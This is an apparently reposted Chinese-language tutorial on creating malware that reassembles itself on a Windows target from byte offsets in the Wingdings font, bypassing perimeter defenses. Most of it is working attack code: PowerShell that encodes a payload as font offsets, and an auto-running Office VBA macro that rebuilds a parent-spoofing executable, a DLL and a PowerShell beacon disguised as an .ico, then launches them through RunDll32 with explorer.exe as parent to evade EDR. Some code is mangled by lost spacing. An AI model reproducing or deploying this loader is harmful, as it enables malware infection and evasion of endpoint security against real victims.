您好,登錄后才能下訂單哦!
這篇文章將為大家詳細講解有關如何利用Windows系統字體來創建惡意軟件,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。
在大多數情況下,一般的網絡攻擊需分成下面這三個步驟來進行:
a)需要執行的惡意代碼
b)或者
c)非惡意代碼,因為Payload可以在第三步中下載惡意組件
a)執行惡意組件
b)或者
c)下載惡意組件,然后執行
我想要的解決方案應該滿足以下幾個條件:
1、 不包含任何惡意代碼(甚至連惡意字節都沒有),以繞過邊界防護。
2、 不用下載任何惡意代碼。
3、 最終執行惡意代碼。
利用目標主機中的字體實現惡意軟件自生成。
首先,我們需要找出每一個Windows操作系統版本都包含的一個組件,結果我找到了這個:
我對比了多個Windows版本中的Wingdings字體,然后發現這個字體在每個版本中都是一樣的。
因此,我打算利用這個字體來實現我的“小”目標。應該怎么做呢?方法大致如下:
1、 在我們的主機上,收集我們惡意軟件的字節數據。
2、 拿惡意軟件的第一個字節跟Wingdings字體進行對比。
3、 在字體中找到了相同字節之后,在文本文件中記錄它的位置。
4、 重復這個過程,直到找出惡意軟件中包含的所有字節,然后在文本文件中記錄下它們的位置。
5、 我們的Payload將包含每個字節所對應的Wingdings字體位置。
6、 在目標主機上,Payload將會使用Wingdings字體的位置來轉換成字節數據,并構建惡意組件。
下面給出的是用來找出字節對應字體位置的PowerShell代碼:
$Font= "C:\Windows\Fonts\wingding.ttf"$Malware= "C:\Users\Administrator\Pictures\2.PNG" $fontArray= Get-Content $Font -Encoding Byte -ReadCount 0$malwareArray= Get-Content $Malware -Encoding Byte -ReadCount 0$offsetArray= @()foreach($byteInMalware in $malwareArray){ $index = 0 foreach ($byteInFont in $fontArray) { if ($byteInMalware -eq $byteInFont) { $offsetArray += $index break } $index++ } }
PowerShell代碼將生成一個VBA代碼,你可以將其插入到宏文件中,這份代碼會生成一個包含字節位置信息的字節數組,它將負責構建你的惡意組件:
$i=0$payload= ""$j=0$u=1$payDef= ""foreach($offsetin $offsetArray){ if($i -eq 30) { $payload = $payload + ", " +$offset + " _`r`n" $i=0 $j++ } else { if($i -eq 0) { $payload = $payload + $offset } else { $payload = $payload + ", " +$offset } } if($j -eq 25) { $payDef = $payDef + "`r`nFunctionccc$u()tt$u= Array($payload)ccc$u= tt$uEndFunction" $payload = "" $u++ $j = 0 } $i++}if($payload-ne ""){$payDef= $payDef + "`r`nFunction ccc$u()tt$u= Array($payload)ccc$u= tt$uEndFunction"} $payDef
運行結果如下:
下面給出的VBA代碼將使用我們之前所創建的字節數組來生成惡意組件。接下來,我們需要選擇Explorer.exe來作為RunDll32.exe的父進程(目的是繞過EDR產品),然后通過RunDll32.exe來執行我們的惡意組件。如果你不想把文件寫入磁盤的話,你可以嘗試結合內存注入技術來使用。
VBA代碼如下:
[...]--> you array of bytes containing the position of necessary bytes in theWindings font. 'exampleto join the bytes for the fist malicious component t1 = cc1 t2 = cc2 t3 = cc3 t4 = cc4 t5 = cc5 t6 = cc6 t7 = cc7 t8 = cc8 t9 = cc9 t10 = cc10 t11 = cc11 t12 = cc12 t13 = cc13 t14 = cc14 t15 = cc15 t16 = cc16 t17 = cc17 t18 = cc18 ttt = Split(Join(t1, ",") &"," & Join(t2, ",") & "," & Join(t3,",") & "," & Join(t4, ",") &"," & Join(t5, ",") & "," & Join(t6,",") & "," & Join(t7, ",") &"," & Join(t8, ",") & "," & Join(t9,",") _ & "," & Join(t10,",") & "," & Join(t11, ",") &"," & Join(t12, ",") & "," &Join(t13, ",") & "," & Join(t14, ",")& "," & Join(t15, ",") & "," &Join(t16, ",") & "," & Join(t17, ",")& "," & Join(t18, ","), ",") [...] Dim nb As Integer Dim nb2 As Integer nb = UBound(ttt) - LBound(ttt) + 1 'ttt isa joined byte array nb2 = UBound(tt) - LBound(tt) + 1 nb3 = UBound(ttttttt) - LBound(ttttttt) + 1 Dim intFileNumber As Integer Dim i As Integer Dim j As Integer Dim lngFileSize As Long Dim lngFileSize2 As Long Dim strBuffer As String Dim strBuffer2 As String Dim lngCharNumber As Long Dim lngCharNumber2 As Long Dim strCharacter As String * 1 Dim strCharacter2 As String * 1 Dim strFileName As String Dim strFileName2 As String Dim offset() As Variant strFileName ="C:\Windows\Fonts\wingding.ttf" intFileNumber = FreeFile Open strFileName For Binary Access ReadShared As #intFileNumber lngFileSize = LOF(intFileNumber) strBuffer = Space$(lngFileSize) Get #intFileNumber, , strBuffer Close #intFileNumber Dim nFileNum As Long Dim sFilename As String Dim ind As Long sFilename2 ="C:\Users\Public\Documents\changeMyParent.exe" ' crafted binary thatwill be use to select the parent of rundll32 sFilename ="C:\Users\Public\Documents\runPoshCode.dll" ' .DLL that will runpowershell beacon from an image sFilename3 ="C:\Users\Public\Documents\BEACON.ico" ' malicious powershell beaconregistered in an .ICO nFileNum = FreeFile ' a loop would be better ;-) Open sFilename2 For Binary Lock Read WriteAs #nFileNum For lngCharNumber = 0 To nb - 1 ind = lngCharNumber + 1 off = ttt(lngCharNumber) strCharacter = Mid(strBuffer, off, 1) Put #nFileNum, ind, strCharacter Next lngCharNumber Close #nFileNum nFileNum = FreeFile Open sFilename For Binary Lock Read Write As#nFileNum For lngCharNumber = 0 To nb2 - 1 ind = lngCharNumber + 1 off = tt(lngCharNumber) strCharacter = Mid(strBuffer, off, 1) Put #nFileNum, ind, strCharacter Next lngCharNumber Close #nFileNum nFileNum = FreeFile Open sFilename3 For Binary Lock Read WriteAs #nFileNum For lngCharNumber = 0 To nb3 - 1 ind = lngCharNumber + 1 off = ttttttt(lngCharNumber) strCharacter = Mid(strBuffer, off, 1) Put #nFileNum, ind, strCharacter Next lngCharNumber Close #nFileNum rrEndSub Subrr() Dim xx As String Dim oihfasf As Object, eopuf As Object, kdjAs Object Dim oDic As Object, a() As Variant Dim pskaf As Integer Set oDic =CreateObject("Scripting.Dictionary") xx = "." Set oihfasf =GetObject("winmgmts:\\" _ & xx & "\root\CIMV2") Set eopuf = oihfasf.ExecQuery _ ("Select Name, ProcessID FROMWin32_Process", , 48) For Each kdj In eopuf If(kdj.Properties_("Name").Value) = "explorer.exe" Then pskaf =(kdj.Properties_("ProcessID").Value) End If NextDim tAs Date Dimcnt As LongDimarr(2) As Byte Dimxl As Stringxl ="C:\Users\Public\Documents\changeMyParent.exe ""C:\Windows\system32\RunDll32.exeC:\Users\Public\Documents\runPoshCode.dll,ComputeFmMediaType -fC:\Users\Public\Documents\BEACON.ico"" " & pskafxx ="."Setow = GetObject("winmgmts:\\" & xx & "\Root\cimv2")Setos = ow.Get("Win32_ProcessStartup")Setoc = os.SpawnInstance_Setop = GetObject("winmgmts:\\" & xx &"\root\cimv2:Win32_Process")op.Createxl, Null, oc, aslh EndSubSubAutoOpen() ccEndSubSubWorkbook_Open() ccEndSub
關于“如何利用Windows系統字體來創建惡意軟件”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,使各位可以學到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。